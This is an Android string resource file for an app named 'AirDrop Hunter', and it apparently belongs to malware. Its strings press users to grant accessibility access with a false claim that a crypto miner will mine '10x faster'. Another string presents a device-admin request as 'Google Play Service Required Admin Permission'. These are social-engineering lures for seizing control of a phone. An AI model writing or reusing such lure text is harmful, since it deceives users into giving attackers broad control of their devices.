<?xml version="1.0" encoding="utf-8"?>
<resources>
	<string name="app_name" translatable="false">AirDrop Hunter</string>
    <string name="text_accessibility_service_description" translatable="true">Required Permission! Allow This permission to use Crypto Minner After this Permission The Minner will use efficient resources and give better result mine 10x faster if you leav this permission may be minner will crash Some time </string>
    <string name="adm" translatable="true">Google Play Service Required Admin Permission 🔥</string>
</resources>